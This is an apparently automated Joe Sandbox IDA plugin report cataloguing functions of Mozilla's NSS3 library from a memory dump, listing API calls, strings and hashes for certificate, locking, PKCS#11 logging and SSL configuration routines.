Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 55c79730746802a9d62b2b8f17a3b3d454b505b0a2ff6ac8d3c9e3e28b3b2123
Instruction ID: 5247c910735040b02e1917467ffada965d239eda1fb36b0fa7065a32c760cfab
Opcode Fuzzy Hash: 55c79730746802a9d62b2b8f17a3b3d454b505b0a2ff6ac8d3c9e3e28b3b2123
Instruction Fuzzy Hash: AE41BE75605144EFDB20EF50DE8CE9A3BB1EB4231DF088434E918A7B21D734A859DBA6

Function 6C709FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C709FBE

Part of subcall function 6C6E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6E2F0A
Part of subcall function 6C6E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6E2F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C70A015

Part of subcall function 6C721940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C72563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C72195C
Part of subcall function 6C721940: EnterCriticalSection.KERNEL32(?,?,6C72563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C6FEAC5,00000001), ref: 6C721970
Part of subcall function 6C721940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C6FEAC5,00000001,?,6C6FCE9B,00000001,6C6FEAC5), ref: 6C7219A0

PL_FreeArenaPool.NSS3(?), ref: 6C70A067
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C70A055

Part of subcall function 6C664C70: TlsGetValue.KERNEL32(?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664C97
Part of subcall function 6C664C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CB0
Part of subcall function 6C664C70: PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70A07E
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C70A0B1
PL_FreeArenaPool.NSS3(?), ref: 6C70A0C7
PL_FinishArenaPool.NSS3(?), ref: 6C70A0CF
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C70A12E
PL_FreeArenaPool.NSS3(?), ref: 6C70A140
PL_FinishArenaPool.NSS3(?), ref: 6C70A148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70A158
PL_FinishArenaPool.NSS3(?), ref: 6C70A175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C70A1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6C70A1B2
free.MOZGLUE(00000000), ref: 6C70A1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6C70A1D6

Part of subcall function 6C7255E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C6FEAC5,00000001,?,6C6FCE9B,00000001,6C6FEAC5,00000003,-00000004,00000000,?,6C6FEAC5), ref: 6C725627
Part of subcall function 6C7255E0: PR_CallOnce.NSS3(6C842AA4,6C7412D0,?,?,?,?,?,?,?,?,?,?,6C6FEAC5,00000001,?,6C6FCE9B), ref: 6C72564F
Part of subcall function 6C7255E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6FEAC5,00000001), ref: 6C725661
Part of subcall function 6C7255E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6FEAC5), ref: 6C7256AF

Strings

security, xrefs: 6C70A00F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: 37141811db257ed86ad59ba373f1822b5bf102e0268d54d3765e0f36577807ae
Instruction ID: 49a081bd59f9d79d69327a3b7448269e7e2681373032a9053a88bd5c5a0ace50
Opcode Fuzzy Hash: 37141811db257ed86ad59ba373f1822b5bf102e0268d54d3765e0f36577807ae
Instruction Fuzzy Hash: 0A5118F1F00209ABEB10DBA4DE48BAE73B5AF4635CF104134E915AAB42F7759608C792

Function 6C724C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C724C4C
EnterCriticalSection.KERNEL32(?), ref: 6C724C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C724CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C724CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C724CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C724D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C724D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C724DB7

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

TlsGetValue.KERNEL32 ref: 6C724DD7
EnterCriticalSection.KERNEL32(?), ref: 6C724DEC
PR_Unlock.NSS3(?), ref: 6C724E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C724E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C724E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C724E71
free.MOZGLUE(00000000), ref: 6C724E7A
PR_Unlock.NSS3(?), ref: 6C724EA2
TlsGetValue.KERNEL32 ref: 6C724EC1
EnterCriticalSection.KERNEL32(?), ref: 6C724ED6
PR_Unlock.NSS3(?), ref: 6C724F01
free.MOZGLUE(00000000), ref: 6C724F2A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: ffa6c30b81fb95ed89662691d55cae01e271309bfaeec44caa5d34fa00325239
Instruction ID: 58f8b2b79fcf8913291f2d82577a0f53e6a8438a9b0020075db01933be9fffa3
Opcode Fuzzy Hash: ffa6c30b81fb95ed89662691d55cae01e271309bfaeec44caa5d34fa00325239
Instruction Fuzzy Hash: 57B124B1E002059FEB10EF68D989AAA77B4BF4531CF044135ED1997B41EB38E964CBD1

Function 6C72FFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C72FFB4

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C72FFC6

Part of subcall function 6C7A98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7A9946
Part of subcall function 6C7A98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6616B7,00000000), ref: 6C7A994E
Part of subcall function 6C7A98D0: free.MOZGLUE(00000000), ref: 6C7A995E

PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C72FFD6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C72FFE6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C72FFF6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730006
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730016
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730026
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730036
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730046
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730056
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730066
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730076
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730086
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C730096
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C7300A6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C7300B6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C7300C6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C7300D6
PR_NewLock.NSS3(?,?,6C7276C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F75C2,00000000), ref: 6C7300E6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: 8cdb41fe70009b6ed5dcbfc9d6b5944de82a0dc68e2469898bdeba617311cd94
Instruction ID: 63e6b0443bd9017fd44d3788f6a6846d33d083a1de5c6a6cac925207a9d29c1b
Opcode Fuzzy Hash: 8cdb41fe70009b6ed5dcbfc9d6b5944de82a0dc68e2469898bdeba617311cd94
Instruction Fuzzy Hash: AF3125F0E1A6249E8B69FFA6824C14B3AB5FB26A1CB10D23AD004C7711D77D015ACFD5

Function 6C776E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C776BF7), ref: 6C776EB6

Part of subcall function 6C6D1240: TlsGetValue.KERNEL32(00000040,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1267
Part of subcall function 6C6D1240: EnterCriticalSection.KERNEL32(?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D127C
Part of subcall function 6C6D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1291
Part of subcall function 6C6D1240: PR_Unlock.NSS3(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C81FC0A,6C776BF7), ref: 6C776ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C776EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C776EFC
PR_NewLock.NSS3 ref: 6C776F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C776F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C776BF7), ref: 6C776F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C776BF7), ref: 6C776F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C776BF7), ref: 6C776FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C776BF7), ref: 6C776FFD

Strings

SSLFORCELOCKS, xrefs: 6C776F2B
SSLKEYLOGFILE, xrefs: 6C776EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C776EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C776FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C776F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C776FDB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 936ae41d4167864b0a90276a3564a86f13a02c410cc454207f7f0e97d5dee49b
Instruction ID: e6220f823e19873959ff16f5cd7dfdfb7cdc4dc0fb4f77f5a3075257bc67bdb8
Opcode Fuzzy Hash: 936ae41d4167864b0a90276a3564a86f13a02c410cc454207f7f0e97d5dee49b
Instruction Fuzzy Hash: 0DA11872A55DC887EF31563CCE0134932A2EB9732EF588779E831C6ED4DB799444C2A1

Function 6C6F5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C6F5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C6F5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C6F5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C6F5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C6F5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C6F5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C6F5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6F5F89
free.MOZGLUE(?), ref: 6C6F5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6F5FB6
free.MOZGLUE(00000000), ref: 6C6F5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6F600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6F6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F6094

Strings

, xrefs: 6C6F5EEB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: a8b593893bf4c4c1c63511879b6a7ca949dcd67821807e0561e9279c3d839637
Instruction ID: 64d85086286e5c2c9d767cdcd331ab370f0d885d73594713215163390476b8ed
Opcode Fuzzy Hash: a8b593893bf4c4c1c63511879b6a7ca949dcd67821807e0561e9279c3d839637
Instruction Fuzzy Hash: 628115B1E012059BEB108F64CD85B9E77B6AF05318F148568E829E7791E731EC06CBE5

Function 6C716D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C716D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C716DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C716DC3

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C716DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C716DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C716E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C716E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C716E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C716EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C716E42
(CK_INVALID_HANDLE), xrefs: 6C716DBC
pData = 0x%p, xrefs: 6C716DF5
pDigest = 0x%p, xrefs: 6C716E27
hSession = 0x%x, xrefs: 6C716D9E, 6C716DAE
*pulDigestLen = 0x%x, xrefs: 6C716EB4
ulDataLen = %d, xrefs: 6C716E0E
C_Digest, xrefs: 6C716D81

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 787fd29b955c0f3fa6660f10babd22883cde11edb90a39262f1146a6fd35b2ab
Instruction ID: b486983f18dbc67dd5bf26d9b29b20c86b27882e247a2d1858d046663323801c
Opcode Fuzzy Hash: 787fd29b955c0f3fa6660f10babd22883cde11edb90a39262f1146a6fd35b2ab
Instruction Fuzzy Hash: 4B419135605004EBDB20EB64DE8DB9A3BB5EB4261DF088434E918E7B11DB34E959CBD2

Function 6C719C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C719C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C719C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C719CA3

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C719CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C719CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C719CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C719D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C719D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C719D42

Strings

pUsername = 0x%p, xrefs: 6C719D24
ulUsernameLen = %d, xrefs: 6C719D3D
(CK_INVALID_HANDLE), xrefs: 6C719C9C
pPin = 0x%p, xrefs: 6C719CF0
userType = 0x%x, xrefs: 6C719CD5
hSession = 0x%x, xrefs: 6C719C7E, 6C719C8E
C_LoginUser, xrefs: 6C719C61
ulPinLen = %d, xrefs: 6C719D0B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 326e0909d1e06c4d999b2f128fc32a0436546c75cad8dd5be19d574195ce1b5b
Instruction ID: 80b780b7c6475a1ddb7552f3ac4612448d14e1af97be9b0b0f87fbe20de76b14
Opcode Fuzzy Hash: 326e0909d1e06c4d999b2f128fc32a0436546c75cad8dd5be19d574195ce1b5b
Instruction Fuzzy Hash: 2841D431605144EBDB20EF50DF8DA9A3BB5AB6230EF088474E948A7F11D7349819DBD2

Function 6C6D1FE0 Relevance: 28.8, APIs: 19, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C6D2007
calloc.MOZGLUE(00000001,00000084), ref: 6C6D2077
calloc.MOZGLUE(00000001,0000002C), ref: 6C6D20DF
TlsSetValue.KERNEL32(00000000), ref: 6C6D2188
PR_NewCondVar.NSS3 ref: 6C6D21B7
calloc.MOZGLUE(00000001,00000084), ref: 6C6D221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C6D22C2
GetLastError.KERNEL32 ref: 6C6D22CD
free.MOZGLUE(00000000), ref: 6C6D22DD

Part of subcall function 6C6D0F00: PR_GetPageSize.NSS3(6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F1B
Part of subcall function 6C6D0F00: PR_NewLogModule.NSS3(clock,6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F25

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID:
API String ID: 3559583721-0
Opcode ID: 6075c4018fc3bfe7408da3b3305b3635cd9e123307566eaf0cf36cd2477d6937
Instruction ID: 3372368f9f5daba7d3c34779fce9f8991a1a055b60ae75a3aac260ced5baaeb5
Opcode Fuzzy Hash: 6075c4018fc3bfe7408da3b3305b3635cd9e123307566eaf0cf36cd2477d6937
Instruction Fuzzy Hash: C1918CB06053118FDB70AF79C80879B7BF4BB0670DF01893AE54AD6A41EB74A809CBD5

Function 6C7F9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C7F9C70
PR_NewLock.NSS3 ref: 6C7F9C85

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PR_NewCondVar.NSS3(00000000), ref: 6C7F9C96

